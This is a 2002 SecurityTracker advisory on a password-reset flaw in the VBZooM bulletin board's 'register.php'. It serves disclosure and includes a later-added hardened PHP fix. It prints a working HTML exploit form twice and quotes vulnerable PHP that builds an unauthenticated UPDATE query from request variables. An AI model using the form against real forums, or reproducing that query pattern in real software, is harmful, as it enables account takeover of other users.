SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   VBZooM
Vendors:   Vbzoom.com
VBZooM Bulletin Board Bug in 'register.php' Lets Remote Users Reset Other User Passwords
SecurityTracker Alert ID:  1005387
SecurityTracker URL:  http://securitytracker.com/id/1005387
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Oct 8 2002
Impact:   Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.01
Description:   A vulnerability was reported in the VBZooM PHP-based bulletin board. A remote user can reset a target user's password.

It is reported that the vulnerability resides in the 'register.php' file. According to the report, a remote user can submit a specially crafted request to bypass the authentication process and reset a target user's password.

A demonstration exploit form is provided:

<form name="f1" action="http://[targetserver]/vbzoom/register.php" method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form>

Impact:   A remote user can bypass the authentication process and reset a target user's password.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.vbzoom.com/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Reset any user's password in VBZoom forums




Name:    VBZoom
Version Affected:  tested on v1.01; other versions may also be vulnerable
Severity:  Critical
Category: Password reset
Vendor URL:   http://www.vbzoom.com
Author:   hish_hish <hish_hish565@hotmail.com>
Date:   disclosed on 28th August 2002
         Published on 8th Oct 2002

Description
***********
VBZooM is a bulletin board system which is written in PHP.
The problem lies in the SQL query in the file register.php,
and you can reset any user's password (see Details).
 
 
Details
*******
see these few lines from register.php:
1: If ($ChangeProfile==1 And ($VBZooMForumCookiesUserName=="" or 
2: $VBZooMForumCookiesUserName=="deleted"))
3: {
4: include("admin/config.php");
5: include("style/style.php");
6: Echo"<BR>";
 :
 :
9: include("login.php");   // wooow here will catch us, so we want to pass this block.
 :
 :
10: Exit();
11: }
 :
 :
14: if ($REQUEST_METHOD=="POST")
15: {
16: if($ChangeProfile==1 And $UserName!="")
17: {
18: include("admin/config.php");
19: $Connect =mysql_connect($DBHostName,$DBUserName,$DBPassword);
20: $Select =mysql_select_db($DBName,$Connect);
 :
 :
 :
24: $Sql = "UPDATE Member Set Password='$Password',Email='$Email',
      Gender='$Gender',Style='1',HomePage='$HomePage',Photo='$Photo',
      Icq='$Icq',Hotmail='$Hotmail',
      Yahoo='$Yahoo',BirthDate='$BirthDate',Country='$Country',Hobby='$Hobby',
      Job='$Job',Signature='$Signature',AllowEmail='$AllowEmail',
      AllowMail='$AllowMail',AllowMessage='$AllowMessage',
      AllowMailCaseMessage='$AllowMailCaseMessage' where UserName='$UserName'";
31: $Result = mysql_query($Sql);
32: If ($Result)
 {
34: setcookie ("VBZooMForumCookiesUserName","$UserName",time()+604800);
35: setcookie ("VBZooMForumCookiesPassword", "$Password",time()+604800);

We don't want to execute the block between lines 3 and 11, so we pass invalid values to the if statement (line 1).
The lame SQL statement lies at line 24, and it's inside the block (between lines 14 and 35).
So we will pass valid values to reach the SQL statement as follows:
   make <form method="POST" action="register.php">  // to enter the block at line 14
   assign 1 to variable $ChangeProfile, and the victim's UserName to reset his password
   lines 18 - 20 no comment !!
   lines 24 - 35  :)
 
 
Exploit code
**************
<form name="f1" action="http://www.victim.com/vbzoom/register.php" method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form>
   
 
Fix Information
***************
Contact http://www.vbzoom.com
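
Added example, not part of the original advisory or of VBZooM's code: a hardened form of the profile update quoted above, in which the row to change is chosen from server-side session state instead of request variables and the query uses bound parameters. The session key 'user', the CurrentPassword field and the in-memory SQLite demo data are assumptions made for illustration; the Member table and column names follow the quoted excerpt.

```php
<?php
// Added example, not VBZooM code. Assumptions: a PDO handle; the login code
// stores the verified user name in $_SESSION['user'] (hypothetical key);
// CurrentPassword is a hypothetical form field; columns follow the advisory.
function change_profile(PDO $db, array $session, array $post): bool
{
    // Identity comes only from server-side session state. Request fields such
    // as UserName or VBZooMForumCookiesUserName are never used to pick the row.
    $user = $session['user'] ?? null;
    if (!is_string($user) || $user === '') {
        return false; // no authenticated session, no update
    }
    // Re-authenticate before changing credentials.
    $sel = $db->prepare('SELECT Password FROM Member WHERE UserName = ?');
    $sel->execute([$user]);
    $hash = $sel->fetchColumn();
    $current = (string)($post['CurrentPassword'] ?? '');
    if (!is_string($hash) || !password_verify($current, $hash)) {
        return false;
    }
    // Bound parameters; the WHERE clause is tied to the session user.
    $upd = $db->prepare(
        'UPDATE Member SET Password = ?, Email = ?, HomePage = ? WHERE UserName = ?');
    return $upd->execute([
        password_hash((string)($post['Password'] ?? ''), PASSWORD_DEFAULT),
        (string)($post['Email'] ?? ''), (string)($post['HomePage'] ?? ''), $user]);
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE Member (UserName TEXT PRIMARY KEY, Password TEXT, Email TEXT, HomePage TEXT)');
$ins = $db->prepare('INSERT INTO Member (UserName, Password, Email, HomePage) VALUES (?, ?, ?, ?)');
$ins->execute(['alice', password_hash('alice-old', PASSWORD_DEFAULT), 'alice@example.test', '']);
$ins->execute(['bob', password_hash('bob-old', PASSWORD_DEFAULT), 'bob@example.test', '']);

// Constructed request shaped like the advisory's form, naming alice as the target.
$req = ['ChangeProfile' => '1', 'UserName' => 'alice', 'Password' => 'new-pass',
        'Email' => 'x@example.test', 'VBZooMForumCookiesUserName' => 'false'];
$results = [
    change_profile($db, [], $req),                                        // no session
    change_profile($db, ['user' => 'bob'], $req),                         // no re-auth
    change_profile($db, ['user' => 'bob'], $req + ['CurrentPassword' => 'bob-old']),
];
$q = $db->prepare('SELECT Password FROM Member WHERE UserName = ?');
$q->execute(['alice']);
$aliceIntact = password_verify('alice-old', $q->fetchColumn());
echo json_encode(['results' => $results, 'alice_password_unchanged' => $aliceIntact]), "\n";
```

Only the third call succeeds, and it changes bob's row; the UserName and VBZooMForumCookiesUserName values in the request have no effect on which account is updated.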

 
 

